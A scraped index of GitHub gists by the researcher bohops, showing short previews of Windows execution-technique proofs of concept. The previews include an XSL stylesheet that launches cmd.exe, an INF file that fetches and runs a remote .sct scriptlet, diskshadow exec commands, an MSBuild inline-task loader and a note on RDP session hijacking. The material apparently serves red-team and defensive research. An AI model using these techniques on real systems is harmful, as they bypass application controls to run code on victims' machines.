This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:u="p" version="1.0"><ms:script implements-prefix="u" language="JScript">r=new ActiveXObject("http://WScript.Shell ").Run("cmd.exe")</ms:script></stylesheet> |
bohops
/ RDP_Eavesdropping_Hijacking
Last active
December 31, 2022 05:04
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RDP Eavesdropping and Hijacking | |
| ******************************* | |
| I spent some time this evening looking at ways to eavesdrop and hijack RDP sessions. Here is a gist of (semi) interesting findings | |
| that is not very new... | |
| =========== | |
| Inspiration | |
| =========== | |
| As you may already know... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [InternetShortcut] | |
| URL=file:///c:\windows\system32\calc.exe |
bohops
/ calc_exe.inf
Created
May 19, 2018 15:24
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; DRIVER.INF | |
| ; Copyright (c) Microsoft Corporation. All rights reserved. | |
| [Version] | |
| Signature = "$CHICAGO$" | |
| Class=61883 | |
| ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17} | |
| Provider=%Msft% | |
| DriverVer=06/21/2006,6.1.7600.16385 | |
bohops
/ JankyAF.csproj
Last active
April 28, 2022 21:44
Fun loader for Casey Smith's (@subTee) JanyAF.xsl
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask | |
| TaskName="ClassExample" | |
| TaskFactory="CodeTaskFactory" | |
| AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > |
bohops
/ ieuinit.inf
Created
May 20, 2018 21:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [version] | |
| signature="$CHICAGO$" | |
| AdvancedINF=2.0 | |
| [DefaultInstall.Windows7] | |
| UnRegisterOCXs=FunRun | |
| [FunRun] | |
| %11%\scrobj.dll,NI,https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct |
bohops
/ diskshadow.txt
Created
May 21, 2018 02:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Execute | |
| ======= | |
| *Interactive Mode | |
| cmd.exe | |
| c:\windows\system32\diskshadow.exe | |
| > exec calc.exe | |
| > exec "cmd.exe" /c calc.exe | |
| > exit |
bohops
/ ProgIDs.txt
Last active
September 26, 2022 23:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| file | |
| StaticMetafile | |
| StaticDib | |
| clsid | |
| objref | |
| ADODB.Command.6.0 | |
| ADODB.Parameter.6.0 | |
| ADODB.Connection.6.0 | |
| ADODB.Recordset.6.0 | |
| ADODB.Error.6.0 |
bohops
/ PowerShell TCP_Interval.txt
Created
October 17, 2018 16:42
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| while ($true) { | |
| $(Get-Date).ToUniversalTime() | |
| $Runspace = [runspacefactory]::CreateRunspace() | |
| $PowerShell = [powershell]::Create() | |
| $PowerShell.runspace = $Runspace | |
| $Runspace.Open() | |
| [void]$PowerShell.AddScript({ | |
| $tcpConnection = New-Object System.Net.Sockets.TcpClient('1.1.1.1', 80) | |
| $tcpStream = $tcpConnection.GetStream() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| public class TestClass | |
| { | |
| public TestClass() | |
| {} |